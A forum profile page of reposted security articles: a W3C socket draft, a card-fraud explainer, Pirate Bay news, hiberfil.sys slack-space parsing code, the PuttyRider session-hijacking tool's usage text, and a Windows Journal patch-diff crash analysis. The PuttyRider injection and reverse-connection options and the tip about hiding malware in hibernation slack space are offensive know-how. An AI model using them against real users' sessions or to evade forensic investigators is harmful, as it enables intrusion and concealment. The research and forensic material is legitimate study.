-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
TCP and UDP Socket API W3C Working Draft 02 December 2014 This version:TCP and UDP Socket APILatest version:TCP and UDP Socket APIPrevious version:Raw Socket APILatest editor's draft:TCP and UDP Socket APIEditor:Claes Nilsson, Sony MobileRepository:We are on Github.File a bug.Commit history. Copyright © 2014 W3C® (MIT, ERCIM, Keio, Beihang), All Rights Reserved. W3C liability, trademark and document use rules apply. Abstract This API provides interfaces to raw UDP sockets, TCP Client sockets and TCP Server sockets. Status of This Document This section describes the status of this document at the time of its publication. Other documents may supersede this document. A list of current W3C publications and the latest revision of this technical report can be found in the W3C technical reports index at All Standards and Drafts - W3C. The short name for this API has been changed from raw-sockets to tcp-udp-sockets as a more accurate description of its scope. This document was published by the System Applications Working Group as an updated Public Working Draft. This document is intended to become a W3C Recommendation. If you wish to make comments regarding this document, please send them to public-sysapps@w3.org (subscribe, archives). All feedback is welcome. Publication as a Working Draft does not imply endorsement by the W3C Membership. This is a draft document and may be updated, replaced or obsoleted by other documents at any time. It is inappropriate to cite this document as other than work in progress. This document was produced by a group operating under the 5 February 2004 W3C Patent Policy. W3C maintains a public list of any patent disclosures made in connection with the deliverables of the group; that page also includes instructions for disclosing a patent. An individual who has actual knowledge of a patent which the individual believes contains Essential Claim(s) must disclose the information in accordance with section 6 of the W3C Patent Policy. This document is governed by the 14 October 2005 W3C Process Document. Note This specification is based the Streams API, [STREAMS]. Note that the Streams API is work in progress and any changes made to Streams may impact the TCP and UDP Socket API specification. However, it is the editor's ambition to continously update the TCP and UDP API specification to be aligned with the latest version the Streams API. Note This is a note on error handling. When using promises rejection reasons should always be instances of the ECMAScript Error type such as DOMException or the built in ECMAScript error types. See Promise rejection reasons. In the TCP and UDP Socket API the error names defined in WebIDL Exceptions are used. If additional error names are needed an update to Github WebIDL should be requested through a Pull Request. Note This is a note on data types of TCP and UDP to send and receive. In the previous version of this API the send() method accepted the following data types for the data to send: DOMString,Blob, ArrayBuffer or ArrayBufferView. This was aligned with the send() method for Web Sockets. In this Streams API based version only ArrayBuffer is accepted as type for data to send. The reason is that encoding issues in a Streams based API should instead be handled by a transform stream. Table of Contents 1. Introduction 2. Conformance 3. Terminology 4. Security and privacy considerations 5. Interface UDPSocket 5.1 Attributes 5.2 Methods [*]6. Interface TCPSocket 6.1 Attributes 6.2 Methods [*]7. Interface TCPServerSocket 7.1 Attributes 7.2 Methods [*]8. Dictionary UDPMessage 8.1 Dictionary UDPMessage Members [*]9. Dictionary UDPOptions 9.1 Dictionary UDPOptions Members [*]10. Dictionary TCPOptions 10.1 Dictionary TCPOptions Members [*]11. Dictionary TCPServerOptions 11.1 Dictionary TCPServerOptions Members [*]12. Enums 12.1 SocketReadyState [*]A. Acknowledgements [*]B. References B.1 Normative references Sursa: TCP and UDP Socket API
- 1 reply
-
- 1
-
-
What Happens to Stolen Credit Card Data? Posted on December 10, 2014 by Scott Aurnou By Scott Aurnou Reports of high profile data breaches have been hard to miss over the past year. Most recently, it was a breach involving 56 million customers’ personal and credit card information at Home Depot over a five-month period. This is just the latest volley in a wave of sophisticated high profile electronic thefts including Target, Neiman Marcus, Michaels, P.F. Chang’s and Supervalu. Much like the other attacks, the suspected culprit in the Home Depot data breach is a type of malware called a RAM scraper that effectively steals card data while it’s briefly unencrypted at the point of sale (POS) in order to authorize a given transaction. Reports of this type of attack have become increasingly common in the months since the Target breach. Whether it’s a RAM scraper or an “older” threat like a physical skimmer placed directly on a POS machine used to swipe a credit or debit card, phishing attack or simply storing customers’ card information insecurely, the result is the same: credit card data for millions of people winds up in the hands of criminals eager to sell it for profit. How does that process unfold? And how can you – or people you know – get sucked into it? The Basic Process: The journey from initial credit card data theft to fraudulent use of that data to steal goods from other retailers involves multiple layers of transactions. The actual thief taking the card numbers from the victim business’ POS or database doesn’t use it him or herself. First, a hacker – or a team of them – steals the credit card data electronically. Most of these schemes begin in Russia or other parts of Eastern Europe and much of what you might call the “carding trade” is centered there. Next, brokers (also referred to as “re-sellers”) buy the stolen card numbers and related information in bulk and trade them in online carding forums. A hacker may also sell the card data directly to keep more of the profits, though that’s more risky and time-consuming than using a broker. These exchanges are found on the dark net (aka the dark web). That’s a part of the Internet you won’t find through Google, where all manner of illegal and unsavory things can take place. Online prices vary depending on: • The type of card, • Credit limit (if known), • How much additional data is available (CVV codes from the backs of cards and associated zip codes make stolen cards more valuable), • The card owner’s geographic location (a fake card used in the vicinity of the legitimate card holder is less likely to raise suspicion), and • How recently the cards began appearing in the carding forums (i.e., likelihood of card cancellation). Prices for the individual cards have come down significantly in the past few years due to the sheer amount of records available, though brokers can still do quite well from bulk sales of card data. Despite being on the dark web, many of the brokers conduct themselves like regular online businesses and will provide replacements or the equivalent of store credit if cards purchased from them don’t work. The people who buy the card data from the brokers are called “carders.” Once the carders have the stolen card data, there are (at least)… Two distinct variations on the scam: 1) Physical, in-store purchases using fake credit cards. 2) Stolen card numbers used to charge pre-paid credit cards that are, in turn, used to purchase store-specific gift cards (which are less suspicious than general gift cards) and purchases are made online. Variant 1 (“Mystery Shopper”): This variation starts with carders printing up the fake credit cards for use in stores. Once they have the stolen card data, the equipment needed to make the fake cards isn’t that expensive. The carder then usually works with one or more recruiters to find people to use the fake cards (though a carder may do the recruiting him or herself). The enticement to get people to use the fake cards will generally be in the form of email spam and ads in Craigslist or similar sites offering easy money to be a “mystery shopper” or “secret shopper” as part of a “marketing study” or some other semi-plausible justification. Not surprisingly, the items purchased tend to have high resale value. After the physical purchases are made, the “mystery shopper” can either send items to the recruiter/carder (generally via a secure drop site like a vacant office) or directly to someone who has “purchased” an item via an auction site in response to a posting from the recruiter/carder. If sent straight to the carder, he or she then auctions the items directly on eBay, Craigslist or an underground forum on the dark web. The people who actually make the purchases with the fake cards may have no clue what they’re involved in (though sometimes they’re active participants in the scheme or simply low-level criminals looking to use the cards for themselves). They are effectively the “drug mules” of the credit card scam, taking the most risk and getting paid the least. You’ve probably seen one step retailers take to try and stop in-person card fraud. On a counterfeit credit card, the numbers on the magnetic strip and the front of the card generally don’t match – it’s too expensive to create individual fakes. Some retailers have their personnel type in the last four digits on the physical card into the register after the card is swiped. If the numbers don’t match, the card is rejected as a fake. Variant 2 (“Re-shipping”): Rather than making physical cards, in this variation carders use the stolen card data to purchase pre-paid credit cards that are then used to buy store-specific gift cards (Amazon, Best Buy, etc.). Like the “mystery shopper” scheme, recruiters typically use ads and spam emails to entice people, though this time it’s people (especially in the U.S.) seeing “work from home” promises. Sometimes the recruiters will employ a more personalized approach, even going so far as to start a fake “relationship” with the intended target. Then – wait, there’s more – the gift cards are used to purchase items online and those items are shipped to the people responding to the ads, spam or “relationship” overtures. That’s where the “work from home” angle comes in. The people initially receiving the packages directly from an online retailer are called “re-shippers.” People in the United States are used because U.S.-based addresses raise fewer red flags with the retailers. Like the “mystery shoppers,” the re-shippers are the drug mules here (and they are sometimes referred to as “money mules” or “shipping mules”). And, as with the “mystery shopper” scheme, re-shippers can either send items to the recruiter/carder or directly to someone who has “purchased” the item through an auction site. While this may sound a little convoluted, the shell game-like nature of using one card to buy another and then another makes it more difficult for stores to catch onto this scheme before the purchase has already been made and shipped out. After that, it’s generally too late. Sursa: What Happens to Stolen Credit Card Data? | The Security Advocate
-
https://rstforums.com/forum/92665-tapatalk-xss.rst
-
Pirate Bay cofounder Peter Sunde says he’s happy to see site gone "The site was ugly, full of bugs, old code and old design." by Cyrus Farivar - Dec 10 2014, 8:17pm GTBST One of the founders of The Pirate Bay (TPB) has bid good riddance to the site that he helped build a decade ago, which may have been definitively shuttered this week. In a Tuesday blog post, Peter Sunde, who was released last month after having served five months in a Swedish prison for his role in aiding copyright infringement via The Pirate Bay, wrote: TPB has become an institution that people just expected to be there. No one willing to take the technology further. The site was ugly, full of bugs, old code and old design. It never changed except for one thing – the ads. More and more ads was filling the site, and somehow when it felt unimaginable to make these ads more distasteful they somehow ended up even worse. The original deal with TPB was to close it down on its tenth birthday. Instead, on that birthday, there was a party in its "honour" in Stockholm. It was sponsored by some sexist company that sent young girls, dressed in almost no clothes, to hand out freebies to potential customers. There was a ticket price to get in, automatically excluding people with no money. The party had a set lineup with artists, scenes and so on, instead of just asking the people coming to bring the content. Everything went against the ideals that I worked for during my time as part of TPB. "The original team handed it over to, well, less soul-ish people to say the least," he concluded. "From the outside I felt that no one had any interest in helping the community if it didn’t eventually pay out in cash." More than five years ago, Sunde told Ars that in 2006, The Pirate Bay ownership was transferred to an unnamed organization, which then transferred ownership to a shady shell corporation called Reservella. " can't reveal any details I know about Reservella because of [non-disclosure agreements], not even who's the owners," he said at the time. Sursa: Pirate Bay cofounder Peter Sunde says he’s happy to see site gone | Ars Technica
-
Keurig 2.0 Genuine K-Cup Spoofing Vulnerability From: Kenneth Buckler <kenneth.buckler () gmail com> Date: Tue, 9 Dec 2014 13:04:20 -0500 *Overview* Keurig 2.0 Coffee Maker contains a vulnerability in which the authenticity of coffee pods, known as K-Cups, uses weak verification methods, which are subject to a spoofing attack through re-use of a previously verified K-Cup. *Impact* CVSS Base Score: 4.9 Impact Subscore: 6.9 Exploitability Subscore: 3.9 Access Vector: Local Access Complexity: Low Authentication: None Confidentiality Impact: None Integrity Impact: Complete Availability Impact: None *Vulnerable Versions* Keurig 2.0 Coffee Maker *Technical Details* Keurig 2.0 is designed to only use genuine Keurig approved coffee K-Cups. However, a flaw in the verification method allows an attacker to use unauthorized K-Cups. The Keurig 2.0 does verify that the K-Cup foil lid used for verification is not re-used. Step 1: Attacker uses a genuine K-Cup in the Keurig machine to brew coffee or hot chocolate. Step 2: After brewing is complete, attacker removes the genuine K-Cup from the Keurig and uses a knife or scissors to carefully remove the full foil lid from the K-Cup, ensuring to keep the full edges intact. Attacker keeps this for use in the attack. Step 3: Attacker inserts a non-genuine K-Cup in the Keurig, and closes the lid. Attacker should receive an "oops" error message stating that the K-Cup is not genuine. Step 4: Attacker opens the Keurig, leaving the non-genuine K-Cup in the Keurig, and carefully places the previously saved genuine K-Cup lid on top of the non-genuine K-Cup, lining up the puncture hole to keep the lid in place. Step 5: Attacker closes the Keurig, and is able to brew coffee using the non-genuine K-Cup. Since no fix is currently available, owners of Keurig 2.0 systems may wish to take additional steps to secure the device, such as keeping the device in a locked cabinet, or using a cable lock to prevent the device from being plugged in when not being used by an authorized user. Please note that a proof of concept is already available online. *Credit: * Proof of concept at KeurigHack.com Vulnerability Writeup by Ken Buckler, Caffeine Security Caffeine Security Video: Sursa: Full Disclosure: Keurig 2.0 Genuine K-Cup Spoofing Vulnerability
-
Parsing the hiberfil.sys, searching for slack space Implementing functionality that is already available in an available tool is something that has always taught me a lot, thus I keep on doing it when I encounter something I want to fully understand. In this case it concerns the ‘hiberfil.sys’ file on Windows. As usual I first stumbled upon the issue and started writing scripts to later find out someone had written a nice article about it, which you can read here (1). For the sake of completeness I’m going to repeat some of the information in that article and hopefully expand upon it, I mean it’d be nice if I could use this entry as a reference page in the future for when I stumble again upon hibernation files. Our goal for today is going to be to answer the following question: What’s a hiberfil.sys file, does it have slack space and if so how do we find and analyze it? To answer that question will hopefully be answered in the following paragraphs; we are going to look at the hibernation process, hibernation file, it’s file format structure, how to interpret it and finally analyze the found slack space. As usual you can skip the post and go directly to the code. Hibernation process When you put your computer to ‘sleep’ there are actually several ways in which it can be performed by the operating system one of those being the hibernation one. The hibernation process puts the contents of your memory into the hiberfil.sys file so that the state of all your running applications is preserved. By default when you enable hibernation the hiberfil.sys is created and filled with zeros. To enable hibernation you can run the following command in an elevated command shell: powercfg.exe -H on If you want to also control the size you can do: powercfg.exe -H -Size 100 An interesting fact to note is that Windows 7 sets the size of the hibernation file size to 75% of your memory size by default. According to Microsoft documentation (2) this means that hibernation process could fail if it’s not able to compress the memory contents to fit in the hibernation file. This of course is useful information since it indicates that the contest of the hibernation file is compressed which usually will make basic analysis like ‘strings’ pretty useless. if you use strings always go for ‘strings -a <inputfile>’ read this post if you are wondering why. The hibernation file usually resides in the root directory of the system drive, but it’s not fixed. If an administrators wants to change the location he can do so by editing the following registry key as explained by this (3) msdn article: Key Name: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ Value Name: PagingFiles Type: REG_MULT_SZ Data: C:\pagefile.sys 150 500 In the Data field, change the path and file name of the pagefile, along with the minimum and maximum file size values (in megabytes). So if you are performing an incident response or forensic investigation make sure you check this registry key before you draw any conclusion if the hiberfil.sys file is absent from it’s default location. Same goes for creating memory images using hibernation, make sure you get the 100% and write it to a location which doesn’t destroy evidence or where the evidence has already been collected. Where does the slack space come from you might ask? That’s an interesting question since you would assume that each time the computer goes into hibernation mode it would create a new hiberfil.sys file, but it doesn’t. Instead it will overwrite the current file with the contents it wants to save. This is what causes slack space, since if the new data is smaller in size than the already available files the data at the end of the file will still be available even if it’s not referenced by the new headers written to the file. From a forensic standpoint that’s pretty interesting since the unreferenced but available data might contain important information to help the investigation along. If you are working with tools that automatically import / parse or analyse the hiberfil.sys file you should check / ask / test how they handle slack space. In a best case scenario they will inform you about the slack space and try to recover the information, in a less ideal scenario they will inform you that there is slack space but it’s not able to handle the data and in the worst case scenario it will just silently ignore that data and tell you the hibernation file has been processed successfully. Hibernation File structure Now that we know that slack space exists how do we find and process it? First of all we should start with identifying the file format to be able to parse it, which unfortunately isn’t available from Microsoft directly. Luckily for us we don’t need to reverse it (yet?) since there are pretty smart people out there who have already done so. You could read this or this or this to get some very good information about the file format. Let’s look at the parts that are relevant for our purpose of retrieving and analyzing the hibernation slack space. The general overview of the file format is as follow: Hibernation File Format (9) Like you can see in the image above the file format seems reasonably easy to parse if we have the definition of all the headers. The most important headers for us are the “Hibernation File Header” which starts at page zero, the “Memory Table” header which contains a pointer to the next one and the amount of Xpress blocks and the “Xpress image” header which contains the actual memory data. The last two are the headers actually create the chain we want to follow to be able to distinguish between referenced Xpress blocks and blocks which are just lingering around in slack space. The thing to keep in mind is that even though the “Hibernation File Header” contains a lot of interesting information to make a robust tool, it might not be present when we recover a hibernation file. The reason for this is that when Windows resumes from hibernation the first page is zeroed. Luckily it isn’t really needed if you just assume a few constants like page size being 4096 bytes and finding the first Xpress block with a bit of searching around. Let’s have a look at the headers we have been talking about: typedef struct { ULONG Signature; ULONG Version; ULONG CheckSum; ULONG LengthSelf; ULONG PageSelf; UINT32 PageSize; ULONG64 SystemTime; ULONG64 InterruptTime; DWORD FeatureFlags; DWORD HiberFlags; ULONG NoHiberPtes; ULONG HiberVa; ULONG64 HiberPte; ULONG NoFreePages; ULONG FreeMapCheck; ULONG WakeCheck; UINT32 TotalPages; ULONG FirstTablePage; ULONG LastFilePage; PO_HIBER_PREF PerfInfo; ULONG NoBootLoaderLogPages; ULONG BootLoaderLogPages[8]; ULONG TotalPhysicalMemoryCount; } PO_MEMORY_IMAGE, *PPO_MEMORY_IMAGE; The FirstTablePage member is the most important one for us since it contains a pointer to the first memory table. Then again, knowing that the first page might be wiped out, do we really want to parse it when it’s available? Let’s look at the memory table structure: struct MEMORY_TABLE { DWORD PointerSystemTable; UINT32 NextTablePage; DWORD CheckSum; UINT32 EntryCount; MEMORY_TABLE_ENTRY MemoryTableEntries[EntryCount]; }; That’s neat as already expected it contains the NextTablePage member which points to the next memory table. Directly following the memory table we’ll find the Xpress block which have the following header: struct IMAGE_XPRESS_HEADER { CHAR Signature[8] = 81h, 81h, "xpress"; BYTE UncompressedPages = 15; UINT32 CompressedSize; BYTE Reserved[19] = 0; }; It seems this header contains the missing puzzle pieces, since it tells us how big each Xpress block is. So if you followed along, here is the big picture on how it all fits in to be parsed and discover if there is any slack space and if so how much. Find the first MemoryTable Follow pointers until you find the last one Follow all the xpress blocks until the last one Calculate distance from the end of the last block until the end of the file Slack space found There are a few caveats that we need to be aware of (you know this if you already read the references): Every OS version might change the structures and thus their size Everything is page aligned Every memory table entry should correspond to an Xpress block The get the actual compressed size calculate as follow: CompressedSize / 4 + 1 and round it up to 8 Parsing and interpreting the hibernation file The theory sounds pretty straight forward right? The practice however actually made me waste some hours. For one I was assuming the “Hibernation File Header” to be the same across all operating systems, stupid I know. Just didn’t realize it until I was brainstorming with Mitchel Sahertian about why the pointers where not pointing at the correct offsets. This however taught me that when you are writing some proof of concept code you should parse the entire structure, not just reference the structure members you are interested in. Since when you parse the entire structure it gives you more context and the ability to quickly spot that a lot of members contain garbage data. When you are just directly referencing a single member like I was doing, you loose the context and you only get to see one pointer which could virtually be anything. So even after learning this lesson, I still decided to implement the script by just parsing the minimum needed data, even though I used full structures while debugging the code. The most important snippets of the script are highlighted hereafter, the script probably contains bugs although in the few tests I’ve performed it seems to work fine: Finding the first MemoryTable, first we search for an xpress block and then we subtract a full page from it. [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]firstxpressblock = fmm.find(XPRESS_SIG) print "Found Xpress block @ 0x%x" % firstxpressblock firstmemtableoffset = firstxpressblock - PAGE_SIZE[/TD] [/TR] [/TABLE] Finding the pointer to the next MemoryTable in a dynamic way, we want to avoid reversing this structure for every new operating system version or service pack. We start at the beginning of the MemoryTable and force-interpret every four bytes as a pointer, then we check the pointer destination. The pointer destination is checked by verifying that an xpress block follows it immediately, if so it’s valid. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23[/TD] [TD=class: code]def verify_memorytable_offset(offset): """ Verify the table pointer to be valid valid table pointer should have an Xpress block on the next page """ fmm.seek(offset+PAGE_SIZE) correct = False if fmm.read(8) == XPRESS_SIG: correct = True fmm.seek(offset) return correct #could go horribly wrong, seems to work though def find_memorytable_nexttable_offset(data): """ Dynamically find the NextTablePage pointer Verification based on verify_memorytable_offset function """ for i in range(len(data)): toffset = unpack('<I',data[i:(i+4)])[0]*PAGE_SIZE if verify_memorytable_offset(toffset): return i[/TD] [/TR] [/TABLE] After we find the last MemoryTable, we just have to walk all the xpress blocks until the last xpress block and from it’s end till the end of the file we found the slack space: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11[/TD] [TD=class: code]while True: xsize = xpressblock_size(fmm,nxpress) fmm.seek(xsize,1) xh = fmm.read(8) if xh != XPRESS_SIG: break fmm.seek(-8,1) if VERBOSE: print "Xpress block @ 0x%x" % nxpress nxpress = fmm.tell() print "Last Xpress block @ 0x%x" % nxpress[/TD] [/TR] [/TABLE] Analyzing the found hibernation slack space So after all this how do we even know this slack space is really here and can we even extract something useful from it? First of all let’s compare our output to that of volatility, after all it’s the de facto, and in my opinion best, memory analysis tool out there. One of the things you can for example do with volatility is convert the hibernation file into a raw memory file, volatility doesn’t support direct hibernation file analysis. Before converting it however I added two debug lines to the file ‘volatility/plugins/addrspaces/hibernate.py’ Printing the memory table offset: [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]NextTable = MemoryArray.MemArrayLink.NextTable.v() print "memtableoff %x" % NextTable # This entry count (EntryCount) should probably be calculated[/TD] [/TR] [/TABLE] Printing the xpress block offset: [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]XpressHeader = obj.Object("_IMAGE_XPRESS_HEADER", XpressHeaderOffset, self.base) XpressBlockSize = self.get_xpress_block_size(XpressHeader) print "xpressoff %x" % XpressHeaderOffset return XpressHeader, XpressBlockSize[/TD] [/TR] [/TABLE] With this small modification I’m able to compare the output of my script to the output of volatility: Volatility output: ./vol.py -f ~/p/find_hib_slack/hibfiles/a.sys –profile=Win7SP0x86 imagecopy -O ~/p/find_hib_slack/hibfiles/raw.a.img […] memtableoff 10146 xpressoff 10147000 xpressoff 1014f770 xpressoff 101589f0 xpressoff 10160240 xpressoff 10166a98 xpressoff 1016c7a8 xpressoff 10172448 xpressoff 10179b60 xpressoff 1017ff50 xpressoff 10181af8 xpressoff 10181d58 xpressoff 10183790 xpressoff 101877e0 xpressoff 1018c290 xpressoff 10192270 xpressoff 10195890 xpressoff 1019b680 xpressoff 101a0d50 xpressoff 101a5258 xpressoff 101a8608 xpressoff 101aa3e8 xpressoff 101adc70 xpressoff 101b2de0 That looks pretty clear, the last memory table is at offset 0x10146 and the last xpress block is at offset 0x101b2de0 My script: ./find_hib_slack.py hibfiles/a.sys Last MemoryTable @ 0x10146000 Xpress block @ 0x10147000 Xpress block @ 0x1014f770 Xpress block @ 0x101589f0 Xpress block @ 0x10160240 Xpress block @ 0x10166a98 Xpress block @ 0x1016c7a8 Xpress block @ 0x10172448 Xpress block @ 0x10179b60 Xpress block @ 0x1017ff50 Xpress block @ 0x10181af8 Xpress block @ 0x10181d58 Xpress block @ 0x10183790 Xpress block @ 0x101877e0 Xpress block @ 0x1018c290 Xpress block @ 0x10192270 Xpress block @ 0x10195890 Xpress block @ 0x1019b680 Xpress block @ 0x101a0d50 Xpress block @ 0x101a5258 Xpress block @ 0x101a8608 Xpress block @ 0x101aa3e8 Xpress block @ 0x101adc70 Last Xpress block @ 0x101b2de0 Start of slack space @ 270223752 Total file size 1073209344 Slackspace size 765 megs At least we know that the parsing seems to be ok, since our last MemoryTable offset and our last xpress offset match the ones from volatility. We can also see that the end of the last xpress block is way before the end of the file. This indicates that the space in between might contain some interesting data. From a memory forensic perspective it’s logical that volatility doesn’t parse this since the chances of being able to extract any meaningful structured data from it are reduced in comparison with a normal memory image or hibernation file. You can use the output to carve out the slack space with dd if you want to further analyze it, for example like this: dd if=<inputfile> of=<slack.img> bs=1 skip=<start_of_slackspace> The thing is, like with all slack space it can contain virtually anything. If you are really lucky you’ll find nice new MemoryTables and xpress blocks. If you are less lucky you’ll only find partial xpress blocks. For now I’ve opted for medium optimism and assumed we’ll at least be able to find full xpress blocks. So I wrote another scripts which you can use to extract and decompress blocks from a blob of data and write it to a file. After this you can try your luck with strings for example or volatility plugins yarascan or psscan. Here is some example output: ./bulk_xpress_decompress.py hibfiles/a.sys 270223752 Advancing to offset 270223752 Xpress block @ 0x101b65c0 size: 20824 Xpress block @ 0x101bb718 size: 17760 Xpress block @ 0x101bfc78 size: 17240 Xpress block @ 0x101c3fd0 size: 20424 Xpress block @ 0x101c8f98 size: 21072 Xpress block @ 0x101ce1e8 size: 16712 The script also writes all the decompressed output to a file called ‘decompressed.slack’. I use the decompression file from volatility, hope I didn’t mess up any license requirements, since I just included it in it’s entirety. Conclusion Sometimes you really have to dive into a file format to fully understand it, it won’t always end in glorious victory, but you’ll learn a lot during the development of your own script. Also the slack space is a nice place to store your malicious file. I’m taking a guess here, but I assume that if you enlarge the hibernation file, Windows will be fine with it. As long as the incident response or forensic investigator doesn’t look at it you’ll be fine with it and get away without your stash being discovered due to the fact that most tools ignore the slack space. References SANS Digital Forensics and Incident Response Blog | Hibernation Slack: Unallocated Data from the Deep Past | SANS Institute http://download.microsoft.com/download/7/E/7/7E7662CF-CBEA-470B-A97E-CE7CE0D98DC2/HiberFootprint.docx http://msdn.microsoft.com/en-us/library/ms912851(v=winembedded.5).aspx Change hibernation file location [*]http://msdn.microsoft.com/en-us/library/windows/desktop/aa373229(v=vs.85).aspx System power states [*]lcamtuf's blog: PSA: don't run 'strings' on untrusted files (CVE-2014-8485) [*]MoonSols Developer Network - MSDN [*]http://www.blackhat.com/presentations/bh-usa-08/Suiche/BH_US_08_Suiche_Windows_hibernation.pdf [*]http://sandman.msuiche.net/docs/SandMan_Project.pdf [*]http://stoned-vienna.com/downloads/Hibernation%20File%20Attack/Hibernation%20File%20Format.pdf [*]Hibernation File Attack - Peter Kleissner [*]https://github.com/volatilityfoundation Sursa: Parsing the hiberfil.sys, searching for slack space | DiabloHorn
-
[h=1]Pirate site The Pirate Bay goes down, then sails for Costa Rica[/h] Mark Hachman @markhachman The original home of The Pirate Bay, probably the Web’s highest-profile site for copyrighted movies, music, and software, is no longer online. However, at least a placeholder is alive on a Costa Rican domain—though not much more than that. TorrentFreak first noted the outage. The site’s reporters said that they had received a statement from Paul Pintér, Sweden's police national coordinator for IP enforcement, claiming that there had been a raid on a server room owned by The Pirate Bay at a site in Stockholm. According to earlier reporting from the site, however, The Pirate Bay had moved to a cloud-based infrastucture that used 21 “virtual servers” controlled by a load balancer. The idea, according to The Pirate Bay, was that the distributed architecture would make it “raid-proof,” as the site could simply be moved from domain to domain. Whether that’s the case or not, time will tell. The Pirate Bay’s Twitter feed has gone dark since Dec. 3. Related sites, such Suprbay.org, are also offline, as are Bayimg.com and Pastebay.net. The mobile version of The Pirate Bay, themobilebay.org, also timed out when PCWorld tried to access it. Want to learn more about the history of The Pirate Bay? Check out the timeline that TechHive constructed last year. Why this matters: The Pirate Bay has served both as a rallying point both for those who are too cheap to pay for electronic media as well as more civic-minded folk who used the site as a form or protest against increasingly draconian copyright laws.The Pirate Bay has always touted itself as the “most resilient” pirate site on the Web; we’ll find out exactly how resilient over the course of the next few days, it seems. Sursa: Pirate site The Pirate Bay goes down, then sails for Costa Rica | PCWorld http://thepiratebay.cr/
-
Swedish police raid The Pirate Bay and knock the site offline
Nytro replied to Nytro's topic in Stiri securitate
S-au miscat destul de repede: https://thepiratebay.cr/ -
Swedish police raid The Pirate Bay and knock the site offline by Richard Lawler | @Rjcc | 1 hr ago 16 Despite The Pirate Bay's efforts to escape an increasingly hostile environment in Sweden, the torrent site has been taken offline today. TorrentFreak and Swedish paper Dagens Nyheter report this is the result of a police raid as confirmed by Fredrick Ingblad, a special prosecutor for file sharing cases. The Rights Alliance is a local group backed by the music and film industries, and it took credit for the shutdown, claiming its criminal complaint lead to the action and called Pirate Bay an illegal commercial service. Only time will tell if this shutdown sticks, but TorrentFreak says it is affecting the site's forum Suprbay, as well as Bayimg.com and Pastebay.net. [image credit: shutterstock] Sursa: Swedish police raid The Pirate Bay and knock the site offline
-
Cam non-tehnice ceva prezentari. Da, stiu, probabil sunt mult mai multi interesati de ce a facut jurnalista X, dar sunt si persoane interesate de kernel exploitation.
-
PuttyRider Hijack Putty sessions in order to sniff conversation and inject Linux commands. Download PuttyRider-bin.zip Documentation Defcamp 2014 presentation - pdf Usage Operation modes: -l List the running Putty processes and their connections -w Inject in all existing Putty sessions and wait for new sessions to inject in those also -p PID Inject only in existing Putty session identified by PID. If PID==0, inject in the first Putty found -x Cleanup. Remove the DLL from all running Putty instances -d Debug mode. Only works with -p mode -c CMD Automatically execute a Linux command after successful injection PuttyRider will remove trailing spaces and '&' character from CMD PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD -h Print this help Output modes: -f Write all Putty conversation to a file in the local directory. The filename will have the PID of current putty.exe appended -r IP: PORT Initiate a reverse connection to the specified machine and start an interactive session. Interactive commands (after you receive a reverse connection): !status See if the Putty window is connected to user input !discon Disconnect the main Putty window so it won't display anything This is useful to send commands without the user to notice !recon Reconnect the Putty window to its normal operation mode CMD Linux shell commands !exit Terminate this connection !help Display help for client connection Compiling Use Visual Studio Command Prompt: nmake main dll Acknowledgements Thanks to Brett Moore of Insomnia Security for his proof of concept PuttyHijack Sursa: https://github.com/seastorm/PuttyRider
-
[h=1]Hackfest 2014: Jason Gillam presented "Web Penetration Testing with Burp and CO2"[/h] Hackfest 2014: Jason Gillam presented "Web Penetration Testing with Burp and CO2" Slides: http://www.hackfest.ca/conf2014/web-p... Talk description: http://www.hackfest.ca/speaker/jason-... Hackfest: Hackfest.ca >> Hackfest November 7th & 8th 2014 | Bilingual event and the biggest security event held in Quebec, Canada in november which has HackingGames, technical conferences and more! Presented by: Hackfest communication Logo by Hackfest Communication & CC flickr jdhancock
-
CVE-2014-1824 – A New Windows Fuzzing Target Posted November 25, 2014 BeyondTrust Research Team As time progresses, due to constant fuzzing and auditing many common Microsoft products are becoming reasonably hard targets to fuzz and find interesting crashes. There are two solutions to this: write a better fuzzer (american fuzzy lop) or pick a less audited target. In a search for less audited attack surface, we are brought to MS14-038, Vulnerability in Windows Journal Could Allow Remote Code Execution (2975689). Before we start attacking this application, we would like to understand the vulnerability addressed by MS14-038. Windows Journal is a tablet component shipped with Windows Vista forward, meant for taking notes and such. It has a file association of ‘.jnt’. The bulletin doesn’t give too much information, but reveals the problem is some kind of parsing issue. The patch seems to address issues in NBDoc.dll, so let’s look at the bindiff of pre/post patch. The diff is ugly, many functions have changed and a few have been added/removed. So where do we go from here? Looking at the individual changes, we come across a few fixes that look security related, but after numerous dead-ends, one is more attractive than the rest – sub_2ECE0B90. A high level view of this function is seen below. This function is somewhat big and has quite a few changes, but is interesting for a couple reasons: First off, apart from some structural changes, there are several calls to memcpy in the unpatched function. Only one of these has been converted to a memcpy_s in the patched function, the count of which is now passed in as an argument to the function. Secondly, the function looks like it contains some kind of magic value at the top. In the very first basic block, further processing is determined by a call to strncmp, searching for the string “PTC+MSHM”. Perhaps this could be a useful marker for which to search. Assuming that this string is in fact a marker for a path to the vulnerable function we perform a quick Google search. After digging around on archive-ro.com, we end up with a link to a journal file: http://www.phys.ubbcluj.ro/~vasile.chis/cursuri/info/c1.jnt Popping this guy open in a hex editor, we get dozens of hits for PTC+MSHM on a free text search We now proceed dynamically, attempting to trigger a breakpoint in the affected function. We set one in the first block of the function of the unpatched DLL near the call to strncmp on “PTC+MSHM”. Upon hitting it the first time it, the str1 argument looks like this: Grabbing all the bytes up till the second occurrence of 0f61 and flipping the endian, we get two hits in our hex editor, one at offset 0x04df and one at offset 0x2bcb. The second hit is different from the dump, lacking the next word 0b70. So it looks like we are handling this blob at offset 0x04df in the file during the first function call. Continuing on, we set a breakpoint above the memcpy of interest at the top of the block. After some stepping we get to this situation: Well, that 0x0b70 looks familiar… Furtermore, it appears to be pushed as the size parameter to the memcpy. Let’s modify the initial file, changing 700B to FFFF. Restarting the application and opening our modified file, we receive an access violation. So as hoped, we crash in the memcpy and have exercised the vulnerable code. More than this particular vulnerability we are trying to isolate, this crash seems like it may be more indicative of less audited code then, say, 